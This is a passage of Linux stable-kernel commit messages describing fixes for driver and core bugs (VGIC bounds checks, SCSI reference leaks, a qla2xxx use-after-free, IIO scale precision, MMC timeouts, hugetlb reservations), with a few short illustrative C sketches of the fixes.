Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
(cherry picked from commit b30ce9e055)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
commit 112b0b8f8f upstream.
In our VGIC implementation we limit the number of SPIs to a number
that the userland application told us. Accordingly we limit the
allocation of memory for virtual IRQs to that number.
However in our MMIO dispatcher we didn't check if we ever access an
IRQ beyond that limit, leading to out-of-bound accesses.
Add a test against the number of allocated SPIs in check_region().
Adjust the VGIC_ADDR_TO_INT macro to avoid an actual division, which
is not implemented on ARM(32).
[maz: cleaned-up original patch]
Reviewed-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Andre Przywara <andre.przywara@arm.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit df3d422cba upstream.
The code at the end of alua_rtpg_work() is as follows:
scsi_device_put(sdev);
kref_put(&pg->kref, release_port_group);
In other words, alua_rtpg_queue() must hold an sdev reference and a pg
reference before queueing rtpg work. If no rtpg work is queued no
additional references should be held when alua_rtpg_queue() returns. If
no rtpg work is queued, ensure that alua_rtpg_queue() only gives up the
sdev reference if that reference was obtained by the same
alua_rtpg_queue() call.
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Reported-by: Tang Junhui <tang.junhui@zte.com.cn>
Cc: Hannes Reinecke <hare@suse.com>
Cc: Tang Junhui <tang.junhui@zte.com.cn>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1fdd14279e upstream.
The reference count of pg leaks in alua_rtpg_work() because kref_put()
is not called to decrease the reference count of pg when the condition
pg->rtpg_sdev == NULL is satisfied (which is actually easy to satisfy),
causing the pg memory to leak.
Signed-off-by: tang.junhui <tang.junhui@zte.com.cn>
Reviewed-by: Hannes Reinecke <hare@suse.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d3a56ed09 upstream.
While merging mpt3sas & mpt2sas code, we added the is_warpdrive check
condition on the wrong line
---------------------------------------------------------------------------
scsih_target_alloc(struct scsi_target *starget)
sas_target_priv_data->handle = raid_device->handle;
sas_target_priv_data->sas_address = raid_device->wwid;
sas_target_priv_data->flags |= MPT_TARGET_FLAGS_VOLUME;
- raid_device->starget = starget;
+ sas_target_priv_data->raid_device = raid_device;
+ if (ioc->is_warpdrive)
+ raid_device->starget = starget;
}
spin_unlock_irqrestore(&ioc->raid_device_lock, flags);
return 0;
------------------------------------------------------------------------------
That check should be for the line sas_target_priv_data->raid_device =
raid_device;
Due to the above hunk, we are not initializing raid_device's starget for
raid volumes, and so during raid disk deletion the driver is not calling
the scsi_remove_target() API, as the driver observes the starget field of
the raid_device structure as NULL.
Signed-off-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Fixes: 7786ab6aff ("mpt3sas: Ported WarpDrive product SSS6200 support")
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a5dd506e15 upstream.
A system can get hung task timeouts if a qlogic board fails during
initialization (if the board breaks again or fails the init). The hang
involves the scsi scan.
In a nutshell, since commit beb9e315e6 ("qla2xxx: Prevent removal and
board_disable race"):
...it is possible to have freed ha (base_vha->hw) early by a call to
qla2x00_remove_one when pdev->enable_cnt equals zero:
if (!atomic_read(&pdev->enable_cnt)) {
scsi_host_put(base_vha->host);
kfree(ha);
pci_set_drvdata(pdev, NULL);
return;
Almost always, the scsi_host_put above frees the vha structure
(attached to the end of the Scsi_Host we're putting) since it's the last
put, and life is good. However, if we are entering this routine because
the adapter has broken sometime during initialization AND a scsi scan is
already in progress (and has done its own scsi_host_get), vha will not
be freed. What's worse, the scsi scan will access the freed ha structure
through qla2xxx_scan_finished:
if (time > vha->hw->loop_reset_delay * HZ)
return 1;
The scsi scan keeps checking to see if a scan is complete by calling
qla2xxx_scan_finished. There is a timeout value that limits the length
of time a scan can take (hw->loop_reset_delay, usually set to 5
seconds), but this definition is in the data structure (hw) that can get
freed early.
This can yield unpredictable results, the worst of which is that the
scsi scan can hang indefinitely. This happens when the freed structure
gets reused and loop_reset_delay gets overwritten with garbage, which
the scan obliviously uses as its timeout value.
The fix for this is simple: at the top of qla2xxx_scan_finished, check
for the UNLOADING bit in the vha structure (_vha is not freed at this
point). If UNLOADING is set, we exit the scan for this adapter
immediately. After this last reference to the ha structure, we'll exit
the scan for this adapter, and continue on.
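A minimal sketch of that early exit, as it might look at the top of
qla2xxx_scan_finished(); the flag and field names follow the driver's usual
idiom and should be treated as illustrative rather than the verbatim upstream
hunk:

	if (test_bit(UNLOADING, &vha->dpc_flags))
		return 1;	/* report the scan as finished without touching vha->hw */

	if (time > vha->hw->loop_reset_delay * HZ)
		return 1;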
This problem is hard to hit, but I have run into it doing negative
testing many times now (with a test specifically designed to bring it
out), so I can verify that this fix works. My testing has been against a
RHEL7 driver variant, but the bug and patch are equally relevant to
the upstream driver.
Fixes: beb9e315e6 ("qla2xxx: Prevent removal and board_disable race")
Signed-off-by: Bill Kuzeja <william.kuzeja@stratus.com>
Acked-by: Himanshu Madhani <himanshu.madhani@cavium.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d304286abb upstream.
Fix scale configuration/parsing for the h3lis331dl accel driver
when the sensitivity is higher than 1 (m/s^2)/digit.
Signed-off-by: Lorenzo Bianconi <lorenzo.bianconi@st.com>
Fixes: 1e52fefc9b ("iio: accel: Add support for the h3lis331dl accelerometer")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8af644a7d6 upstream.
This fix makes newer ISH hubs work. Previous ones worked by lucky
coincidence.
The rotation sensor does not work due to a missing PM function.
Add the common HID sensor IIO PM function for the rotation sensor.
Further clarification from Srinivas:
If CONFIG_PM is not defined, then this prevents the sensor from
functioning. So the above commit caused this.
This sensor was supposed to be always on to trigger wake up in prior
external hubs. But with the new ISH hub this is not the case.
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Fixes: 2b89635e9a ("iio: hid_sensor_hub: Common PM functions")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6f77199e9e upstream.
While testing, it was observed that on some platforms the scale value
from iio sysfs for gyroscope is always 0 (E.g. Yoga 260). This results
in the final angular velocity component values to be zeros.
This is caused by insufficient precision of scale value displayed in sysfs.
If the precision is changed to nano from current micro, then this is
sufficient to display the scale value on this platform.
Since this can be a problem for all other HID sensors, increase scale
precision of all HID sensors to nano from current micro.
Results on Yoga 260:
name scale before scale now
--------------------------------------------
gyro_3d 0.000000 0.000000174
als 0.001000 0.001000000
magn_3d 0.000001 0.000001000
accel_3d 0.000009 0.000009806
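A hedged sketch of what the nano-precision reporting looks like in an IIO
read_raw() callback; the numbers mirror the gyro_3d row above, and the
function is illustrative rather than the actual hid-sensor code:

static int example_read_raw(struct iio_dev *indio_dev,
			    struct iio_chan_spec const *chan,
			    int *val, int *val2, long mask)
{
	switch (mask) {
	case IIO_CHAN_INFO_SCALE:
		*val = 0;			/* integer part */
		*val2 = 174;			/* fractional part: 0.000000174 */
		return IIO_VAL_INT_PLUS_NANO;	/* previously IIO_VAL_INT_PLUS_MICRO */
	default:
		return -EINVAL;
	}
}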
Signed-off-by: Song Hongyan <hongyan.song@intel.com>
Acked-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7309aa847e upstream.
The variable struct usb_cdc_parsed_header h may be used
uninitialized in acm_probe().
In kernel 4.8:
/* handle quirks deadly to normal probing*/
if (quirks == NO_UNION_NORMAL)
...
goto skip_normal_probe;
}
we bypass call to
cdc_parse_cdc_header(&h, intf, buffer, buflen);
but later use h in
if (h.usb_cdc_country_functional_desc) { /* export the country data */
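A standalone C illustration (not the cdc-acm code itself) of why
zero-initializing the parsed-header structure keeps the quirk path well
defined; the struct below just stands in for usb_cdc_parsed_header:

#include <stdio.h>
#include <string.h>

struct parsed_header {
	void *country_functional_desc;	/* stand-in for usb_cdc_country_functional_desc */
};

int main(void)
{
	struct parsed_header h;
	int quirks = 1;			/* pretend NO_UNION_NORMAL is set */

	memset(&h, 0, sizeof(h));	/* without this, h is indeterminate on the quirk path */

	if (!quirks) {
		/* normal probing would parse the descriptors into h here */
	}

	if (h.country_functional_desc)	/* reads a well-defined NULL, not garbage */
		printf("export the country data\n");
	else
		printf("no country data\n");

	return 0;
}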
Signed-off-by: Oliver Neukum <oneukum@suse.com>
Reported-by: Victor Sologoubov <victor0@rambler.ru>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7c1c5413a7 upstream.
The boot-time frequency of a CPU is considered its rated maximum, as we
have no other source of such information. However, this was previously
only used for chips with 80% restrictions on secondary PLLs. This
usually wasn't a problem because most chips/configs boot with a divider
of /1, with other dividers being used only for dynamic frequency
reduction. However, at least one config (LS1021A at less than 1 GHz)
uses a different divider for top speed. This was causing cpufreq to set
a frequency beyond the chip's rated speed.
This is fixed by applying a 100%-of-initial-speed limit to all CPU PLLs,
similar to the existing 80% limit that only applied to some.
Signed-off-by: Scott Wood <oss@buserror.net>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1c80e9603f upstream.
Bug 150611 uncovered that the WMI ID used by the toshiba-wmi driver
is not Toshiba-specific, and as such, the driver was being loaded
on non-Toshiba laptops too.
This patch adds a DMI matching list checking for TOSHIBA as the
vendor, refusing to load if it is not.
Also the WMI GUID was renamed, dropping the TOSHIBA_ prefix, to
better reflect that this GUID is not a Toshiba-specific one.
Signed-off-by: Azael Avalos <coproscefalo@gmail.com>
Signed-off-by: Darren Hart <dvhart@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8e9e5e80e upstream.
Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.
DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
tcp_sendmsg() used to totally ignore the size parameter.
57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.
Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time". Apparently that was unlikely enough for most, so this went
unnoticed for years.
Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/
This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.
It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).
It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().
Fixes: b411b3637f ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd9afd3cbe upstream.
According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
must have their completion signalled in a finite
amount of time. This is because, until the SKB is
freed by the driver, it holds onto socket,
netfilter, and other subsystem resources."
In summary, this means that using TX IRQ throttling
for the networking gadgets is, at least, complex and
we should avoid it for the time being.
Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Tested-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Suggested-by: David Miller <davem@davemloft.net>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 18266403f3 upstream.
The TIOCMIWAIT implementation would return -EINVAL if any of the three
supported signals were included in the mask.
Instead of returning an error in case TIOCM_CTS is included, simply
drop the mask check completely, which is in accordance with how other
drivers implement this ioctl.
Fixes: 5a6a62bdb9 ("cdc-acm: add TIOCMIWAIT")
Signed-off-by: Johan Hovold <johan@kernel.org>
Acked-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 68fae2f3df upstream.
This basically reverts commit e534f3e9 (staging:nvec: Introduce the use of
the managed version of kzalloc). The serio struct should never be managed
because it is refcounted. Doing so will lead to a double-free oops on
module remove.
Signed-off-by: Marc Dietrich <marvin24@gmx.de>
Fixes: e534f3e942 ("staging:nvec: Introduce the use of the managed version of kzalloc")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 17c1c9ba15 upstream.
This reverts commit 36b30d6138.
This is necessary to detect paz00 (ac100) touchpad properly as one
speaking ETPS/2 protocol. Without it X.org's synaptics driver doesn't
work as the touchpad is detected as an ImPS/2 mouse instead.
Commit ec6184b1c7 changed the way
auto-detection is performed on ports marked as pass through and made the
issue apparent.
A pass through port is an additional PS/2 port used to connect a slave
device to a master device that is using PS/2 to communicate with the
host (so slave's PS/2 communication is tunneled over master's PS/2
link). "Synaptics PS/2 TouchPad Interfacing Guide" describes such a
setup (PS/2 PASS-THROUGH OPTION section).
Since paz00's embedded controller is not connected to a PS/2 port
itself, the PS/2 interface it exposes is not a pass-through one.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Fixes: 36b30d6138 ("staging: nvec: ps2: change serio type to passthrough")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8f8a74d5f upstream.
This command was sent behind serio's back and the answer to it was
confusing the atkbd probe function, which led to the elantech touchpad
being detected as a keyboard.
To prevent this from happening just let every party do its part of the
job.
Signed-off-by: Paul Fertser <fercerpav@gmail.com>
Acked-by: Marc Dietrich <marvin24@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 55abe8165f upstream.
`ni_tio_clock_period_ps()` used to return the clock period in
picoseconds, and had a `BUG()` call for invalid cases. It was changed
to pass the clock period back via a pointer parameter and return an
error for the invalid cases. Unfortunately the code to handle
user-specified clock sources with user-specified clock period is still
returning the clock period the old way, which can lead to the caller not
getting the clock period, or seeing an unexpected error. Fix it by
passing the clock period via the pointer parameter and returning `0`.
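A small standalone sketch of the convention the fix restores: the clock
period is always reported through the pointer parameter, while the return
value is reserved for 0 or a negative error code (names and values here are
illustrative, not the comedi driver code):

#include <errno.h>
#include <stdio.h>

/* Returns 0 on success and stores the period via the pointer,
 * or a negative error code for an invalid clock source. */
static int get_clock_period_ps(int clock_source, unsigned long user_period_ps,
			       unsigned long *period_ps)
{
	switch (clock_source) {
	case 0:				/* built-in timebase, fixed period */
		*period_ps = 50000;
		return 0;
	case 1:				/* user-specified clock source */
		*period_ps = user_period_ps;
		return 0;		/* the bug was returning the period here directly */
	default:
		return -EINVAL;
	}
}

int main(void)
{
	unsigned long period;

	if (get_clock_period_ps(1, 12500, &period) == 0)
		printf("period = %lu ps\n", period);
	return 0;
}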
Fixes: b42ca86ad6 ("staging: comedi: ni_tio: remove BUG() checks for ni_tio_get_clock_src()")
Signed-off-by: Ian Abbott <abbotti@mev.co.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 33c027ae3c upstream.
Earlier commits 30ca5cb63c ("staging: sm750fb: change definition of
PANEL_PLANE_TL fields") and 27b047bbe1 ("staging: sm750fb: change
definition of PANEL_PLANE_BR fields") modified the register bit field
definitions. But the modifications are wrong, because the bit mask of
"bit field 10:0" is not 0xeff but 0x7ff. The wrong definitions make the
display behave very strangely.
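The arithmetic can be checked in isolation: an 11-bit field spanning bits
10:0 has mask (1 << 11) - 1 = 0x7ff, whereas 0xeff clears bit 8 and sets
bit 11:

#include <stdio.h>

int main(void)
{
	unsigned int mask = (1u << 11) - 1;	/* bits 10:0 */

	printf("0x%x\n", mask);			/* prints 0x7ff, not 0xeff */
	return 0;
}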
Signed-off-by: Huacai Chen <chenhc@lemote.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 34eee70a7b upstream.
The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:
drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]
This adds minimal error handling so we only evaluate the
data if it was correctly read.
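A standalone sketch of the shape of that error handling, with a made-up read
helper that returns 0 on success and a negative value on failure:

#include <stdio.h>

/* Stand-in for a bus read helper: 0 on success, negative on error. */
static int read_status(unsigned char *status)
{
	*status = 0x01;
	return 0;
}

static void poll_work(void)
{
	unsigned char status;
	int ret = read_status(&status);

	if (ret < 0)
		return;			/* do not evaluate status if the read failed */

	if (status & 0x01)
		printf("data valid, process the conversion result\n");
}

int main(void)
{
	poll_work();
	return 0;
}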
Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Lars-Peter Clausen <lars@metafoo.de>
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fe1b5700c7 upstream.
In the eMMC 4.51 version of the spec, an EXT_CSD field called
GENERIC_CMD6_TIME[248] was added. This allows cards to specify the maximum
time it may need to move out from its busy state, when a CMD6 command has
been sent.
In cases when the card is compliant to versions < 4.51 of the eMMC spec,
obviously the core needs to use a fall-back value for this timeout, which
currently is set to 10 minutes. This value is completely in the wrong range
and importantly in some cases it causes a card initialization to take more
than 10 minutes to complete.
Earlier this scenario was avoided as the mmc core used CMD13 to poll the
card, to find out when it stopped signaling busy. Commit 08573eaf1a
("mmc: mmc: do not use CMD13 to get status after speed mode switch")
changed this behavior.
Instead of reverting that commit, which would cause other issues, let's
instead start by picking a simple solution for the problem, by using a
500ms default generic CMD6 timeout.
The reason for using exactly 500ms comes from observations showing it's
quite common for cards to specify 250ms. 500ms is two times that value,
so it should likely be enough for most cards.
Fixes: 08573eaf1a ("mmc: mmc: do not use CMD13 to get status after speed
mode switch")
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Tested-by: Stephen Boyd <sboyd@codeaurora.org>
Tested-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 69b962a65a upstream.
In the busy response case (i.e. !host->data), an unexpected data interrupt
would result in clearing the data command as though it had completed but
without informing the upper layers and thus resulting in a hang. Fix by
only clearing the data command for data interrupts that are expected.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ebebeab51 upstream.
CMD line reset during an ongoing data transfer can cause the data transfer
to hang. Fix by delaying the reset until the data transfer is finished.
Signed-off-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c25badc9ce upstream.
When converting to a shared library in ac5a181d06 ("cpupower: Add
cpuidle parts into library"), cpu_freq_cpu_exists() was converted to
cpupower_is_cpu_online(). cpu_freq_cpu_exists() returned 0 on success and
-ENOSYS on failure whereas cpupower_is_cpu_online returns 1 on success.
Check for the correct return value in cpufreq-set.
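A hedged fragment of what the corrected test amounts to, given that
cpupower_is_cpu_online() returns 1 for an online CPU (the surrounding loop
in cpufreq-set.c is omitted and the exact code may differ):

	if (cpupower_is_cpu_online(cpu) != 1)
		continue;	/* skip CPUs that are offline or could not be queried */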
Link: https://bugzilla.redhat.com/show_bug.cgi?id=1374212
Fixes: ac5a181d06 (cpupower: Add cpuidle parts into library)
Reported-by: Julian Seward <jseward@acm.org>
Signed-off-by: Laura Abbott <labbott@redhat.com>
Acked-by: Thomas Renninger <trenn@suse.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d2cdf5dc58 upstream.
When the system is suspended to S3 the BIOS might re-initialize certain
GPIO pins back to their original state or it may re-program interrupt mask
of others. For example Acer TravelMate B116-M had BIOS bug where certain
GPIO pin (MF_ISH_GPIO_5) was programmed to trigger on high level, and the
pin state was high once the BIOS gave control to the OS on resume.
This triggers lots of messages like:
irq 117, desc: ffff88017a61e600, depth: 1, count: 0, unhandled: 0
->handle_irq(): ffffffff8109b613, handle_bad_irq+0x0/0x1e0
->irq_data.chip(): ffffffffa0020180, chv_pinctrl_exit+0x2d84/0x12 [pinctrl_cherryview]
->action(): (null)
IRQ_NOPROBE set
We reset the mask back to known state in chv_pinctrl_resume() but that is
called only after device interrupts have already been enabled.
Now, this particular issue was fixed by upgrading the BIOS to the latest
(v1.23) but not everybody upgrades their BIOSes so we fix it up in the
driver as well.
Prevent the possible interrupt storm by moving suspend and resume hooks to
be called at _noirq time instead. Since device interrupts are still
disabled we can restore the mask back to known state before interrupt storm
happens.
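A hedged sketch of what moving the hooks to _noirq time looks like with the
standard dev_pm_ops helper; the callback names are illustrative:

static const struct dev_pm_ops chv_pinctrl_pm_ops = {
	/* runs while device interrupts are still disabled, so the interrupt
	 * mask can be restored before a storm can start */
	SET_NOIRQ_SYSTEM_SLEEP_PM_OPS(chv_pinctrl_suspend_noirq,
				      chv_pinctrl_resume_noirq)
};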
Reported-by: Christian Steiner <christian.steiner@outlook.de>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 56211121c0 upstream.
If async suspend is enabled, the driver may access registers concurrently
with another instance which may fail because of the bug in Cherryview GPIO
hardware. Prevent this by taking the shared lock while accessing the
hardware in suspend and resume hooks.
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a79a812131 upstream.
We used to use generic implementation of dma_map_ops.mmap which is
dma_common_mmap() but that only worked for simpler cached mappings when
vaddr = paddr.
If a driver requests an uncached DMA buffer, the kernel maps it to a
virtual address so that the MMU gets involved and the page's uncached
status is taken into account. In that case the use of dma_common_mmap()
led to mapping vaddr to vaddr for user-space, which is obviously wrong.
For more details please refer to the verbose explanation here [1].
So here we implement our own version of mmap() which always deals
with dma_addr and maps underlying memory to user-space properly
(note that DMA buffer mapped to user-space is always uncached
because there's no way to properly manage cache from user-space).
[1] https://lkml.org/lkml/2016/10/26/973
Reviewed-by: Catalin Marinas <catalin.marinas@arm.com>
Cc: Marek Szyprowski <m.szyprowski@samsung.com>
Signed-off-by: Alexey Brodkin <abrodkin@synopsys.com>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 16d917b130 upstream.
If we're using a shadow copy of a PCI device ROM, the shadow copy is in RAM
and the device never sees accesses to it and doesn't respond to it. We
don't have to route the shadow range to the PCI device, and the device
doesn't have to claim the range.
Previously we treated the shadow copy as though it were the ROM BAR, and we
failed to claim it because the region wasn't routed to the device:
pci 0000:01:00.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]
pci_bus 0000:01: Allocating resources
pci 0000:01:00.0: can't claim BAR 6 [mem 0x000c0000-0x000dffff]: no compatible bridge window
The failure path of pcibios_allocate_dev_rom_resource() cleared out the
resource start address, which also caused the following ioremap() warning:
WARNING: CPU: 0 PID: 116 at /build/linux-akdJXO/linux-4.8.0/arch/x86/mm/ioremap.c:121 __ioremap_caller+0x1ec/0x370
ioremap on RAM at 0x0000000000000000 - 0x000000000001ffff
Handle an option ROM shadow copy as RAM, without trying to insert it into
the iomem resource tree.
This fixes a regression caused by 0c0e0736ac ("PCI: Set ROM shadow
location in arch code, not in PCI core"), which appeared in v4.6. The
regression causes video device initialization to fail. This was reported
on AMD Turks, but it likely affects others as well.
Fixes: 0c0e0736ac ("PCI: Set ROM shadow location in arch code, not in PCI core")
Reported-and-tested-by: Vecu Bosseur <vecu.bosseur@gmail.com>
Link: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1627496
Link: https://bugzilla.kernel.org/show_bug.cgi?id=175391
Link: https://bugzilla.redhat.com/show_bug.cgi?id=1352272
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 922cc17199 upstream.
The current code doesn't even compile as somehow the inline assembly
can't see the register names defined as ARC_RTC_*
I'm pretty sure it worked when I first got it merged, but the tools were
definitely different then.
So better to write this in "C" anyways.
Acked-by: Daniel Lezcano <daniel.lezcano@linaro.org>
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 237d6e6884 upstream.
Since commit d86bd1bece ("mm/slub: support left redzone") it is no longer
guaranteed that kmalloc(PAGE_SIZE) returns page aligned memory.
After the above commit we get an error for diag224 because aligned
memory is required. This leads to the following user visible error:
# mount none -t s390_hypfs /sys/hypervisor/
mount: unknown filesystem type 's390_hypfs'
# dmesg | grep hypfs
hypfs.cccfb8: The hardware system does not provide all functions
required by hypfs
hypfs.7a79f0: Initialization of hypfs failed with rc=-61
Fix this problem and use get_free_page() instead of kmalloc() to get
correctly aligned memory.
Signed-off-by: Michael Holzheu <holzheu@linux.vnet.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 70d78fe7c8 upstream.
It could be not possible to freeze coredumping task when it waits for
'core_state->startup' completion, because threads are frozen in
get_signal() before they got a chance to complete 'core_state->startup'.
Inability to freeze a task during suspend will cause suspend to fail.
Also CRIU uses cgroup freezer during dump operation. So with an
unfreezable task the CRIU dump will fail because it waits for a
transition from 'FREEZING' to 'FROZEN' state which will never happen.
Use freezer_do_not_count() to tell freezer to ignore coredumping task
while it waits for core_state->startup completion.
Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Acked-by: Pavel Machek <pavel@ucw.cz>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Tejun Heo <tj@kernel.org>
Cc: "Rafael J. Wysocki" <rjw@rjwysocki.net>
Cc: Michal Hocko <mhocko@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 96b96a96dd upstream.
Error paths in hugetlb_cow() and hugetlb_no_page() may free a newly
allocated huge page.
If a reservation was associated with the huge page, alloc_huge_page()
consumed the reservation while allocating. When the newly allocated
page is freed in free_huge_page(), it will increment the global
reservation count. However, the reservation entry in the reserve map
will remain.
This is not an issue for shared mappings as the entry in the reserve map
indicates a reservation exists. But, an entry in a private mapping
reserve map indicates the reservation was consumed and no longer exists.
This results in an inconsistency between the reserve map and the global
reservation count. This 'leaks' a reserved huge page.
Create a new routine restore_reserve_on_error() to restore the reserve
entry in these specific error paths. This routine makes use of a new
function vma_add_reservation() which will add a reserve entry for a
specific address/page.
In general, these error paths were rarely (if ever) taken on most
architectures. However, powerpc contained arch-specific code that
resulted in an extra fault and execution of these error paths on all
private mappings.
Fixes: 67961f9db8 ("mm/hugetlb: fix huge page reserve accounting for private mappings)
Link: http://lkml.kernel.org/r/1476933077-23091-2-git-send-email-mike.kravetz@oracle.com
Signed-off-by: Mike Kravetz <mike.kravetz@oracle.com>
Reported-by: Jan Stancek <jstancek@redhat.com>
Tested-by: Jan Stancek <jstancek@redhat.com>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Acked-by: Hillf Danton <hillf.zj@alibaba-inc.com>
Cc: Naoya Horiguchi <n-horiguchi@ah.jp.nec.com>
Cc: Michal Hocko <mhocko@suse.com>
Cc: Kirill A . Shutemov <kirill.shutemov@linux.intel.com>
Cc: Dave Hansen <dave.hansen@linux.intel.com>
